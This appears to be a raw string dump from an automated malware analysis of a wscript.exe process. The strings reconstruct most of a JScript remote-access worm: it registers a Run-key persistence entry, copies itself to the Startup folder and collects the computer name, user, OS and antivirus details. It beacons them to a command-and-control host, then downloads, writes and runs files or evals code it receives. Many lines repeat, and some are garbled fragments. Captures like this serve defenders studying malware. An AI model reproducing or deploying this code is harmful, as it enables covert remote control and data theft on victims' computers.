Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: u = "true";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.regwrite(g[2],u,g[5]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } else {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: u = "false";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ns();
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var p = pt('vre','');
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: p = p.split(spl);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "cl") {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.quit(1);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "sc") {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s2 = ex("temp") + "\\" + p[2];
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fi = fs.createtextfile(s2,true);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fi.write(p[1]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fi.close();
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.run(s2);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "ex") {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eval(p[1]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "rn") {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ri = fs.opentextfile(fu,1);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fr = ri.readall();
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ri.close();
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vn = vn.split("_");
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fr = fr.replace(vn[0],p[1]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var wi = fs.opentextfile(fu,2,false);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wi.write(fr);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wi.close();
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.run("wscript.exe //b \"" + fu + "\"");
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "up") {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ctf = fs.createtextfile(s2,true);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var gu = p[1];
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gu = gu.replace("|u|","|v|");
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ctf.write(gu);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ctf.close();
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.run("wscript.exe //b \"" + s2 + "\"",6);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "un") {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s2 = p[1];
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var vdr = fu;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var regi = "nothing!";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%rgne%",regi);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eval(s2);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "rf") {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.sleep(7000);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } while (true) ;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function ex(s) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return sh.expandenvironmentstrings("%" + s + "%");
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function pt(c,a) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var x = cr(3);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x.open('post','http://javaautorun.duia.ro:5465/' + c, false);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x.setrequestheader("user-agent:",nf());
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x.send(a);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return x.responsetext;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function nf() {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s,nt,i;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (fs.fileexists(ex("windir") + "\\microsoft.net\\framework\\v2.0.50727\\vbc.exe")) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nt ="yes";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nt = "no";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = vn + ch + ex("computername") + ch + ex("username") + ch + ob(2) + ch + ob(4) + ch + ch + nt + ch + u + ch;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return s;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function cr(n) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return new activexobject(j[n]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function ob(n) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var s;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (n == 2) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = getobject(y[0]).instancesof(y[2]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var en = new enumerator(s);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: for (; !en.atend();en.movenext()) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var it = en.item();
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return it.caption;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: break;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (n == 4) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = getobject(wmg).instancesof(y[3]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var str = it.displayname;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (str !== '') {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wmg = wmg + "2";
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: en = new enumerator(s);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: it = en.item();
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return it.displayname;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (n==6) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s = getobject(y[0]).instancesof(y[1]);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return it.volumeserialnumber;
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: function ns() {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: try {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ap = cr(2);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fs.copyfile(fu, ap.namespace(7).self.path + "\\" + wn,true);
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } catch(err) {
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \jdkn7
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: number
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: description
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: message$
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: atend
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: message
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: item4
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: messagec
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ~/0\
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ~2&^
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: re", "
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ~5;^
Source: wscript.exe, 00000001.00000002.847480480.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ~<2^
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scriptfullname
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scriptname
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tryx$
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regread@2<
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: catch@z@
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: split
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :\@1l
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: true@
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regwrite@5
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: else@
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: false@
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: quit8
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: temp@!
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: createtextfile?
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: true@
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: write@
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: close@
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: run@h
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eval@
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: opentextfile@8
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readall@
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: replace`'
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: false@^
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.exe //b "@"<
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regi@
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nothing!@
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %sfdr@&6
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %rgne%@
Source: wscript.exe, 00000001.00000003.380317773.00000228B2891000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sleep
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscript.shell]
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 4scripting.filesystemobjectz
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: #"shell.applicatione$
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ="microsoft.xmlhttp
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkcull
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkcu\vjw0rm
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ^\software\microsoft\windows\currentversion\run\
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ,hklm\software\classes\
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_sz
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \defaulticon\p
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winmgmts:h
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: b"win32_logicaldisk
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: *win32_operatingsystem
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: antivirusproductn
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9/21_
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: wscripti
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scriptfullname6;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scriptname
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regread2
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: split6
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regwrite5
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: false-
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: createtextfile
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: write&
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: close
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: opentextfile
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: readall
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: replace~
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "wscript.exe //b ""
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nothing!
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %sfdrf"
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %rgne%
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sleeps
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0expandenvironmentstrings%
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: postu
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >u@http://javaautorun.duia.ro:5465/
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: setrequestheadere
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: user-agent:
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sendd1a
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: responsetexts
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fileexists
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: windir
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: v\microsoft.net\framework\v2.0.50727\vbc.exe
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: computernamep
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: usernamen
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: activexobject#
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: getobject
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: instancesof
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: enumerator
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: atend/i
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: item.(<
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: caption
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: movenext
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rpwinmgmts:\\localhost\root\securitycenter3
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: displaynameq
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: $volumeserialnumber
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: copyfile
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: namespace
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t:p_m
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :eval code// coded by v_b01 | sliemerez -> twitter : sliemerez
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var j = ["wscript.shell","scripting.filesystemobject","shell.application","microsoft.xmlhttp"];
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var g = ["hkcu","hklm","hkcu\\vjw0rm","\\software\\microsoft\\windows\\currentversion\\run\\","hklm\\software\\classes\\","reg_sz","\\defaulticon\\"];
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var y = ["winmgmts:","win32_logicaldisk","win32_operatingsystem",'antivirusproduct'];
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var sh = cr(0);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fs = cr(1);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var spl = "|v|";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var ch = "\\";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var vn = "9/21" + "_" + ob(6);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var fu = wscript.scriptfullname;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var wn = wscript.scriptname;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var u;
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: try {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: u = sh.regread(g[2]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } catch(err) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var sv = fu.split("\\");
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (":\\" + sv[1] == ":\\" + wn) {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: u = "true";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sh.regwrite(g[2],u,g[5]);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: } else {
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: u = "false";
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ns();
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: var p = pt('vre','');
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: p = p.split(spl);
Source: wscript.exe, 00000001.00000003.312910094.00000228B28AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if (p[0] === "cl") {
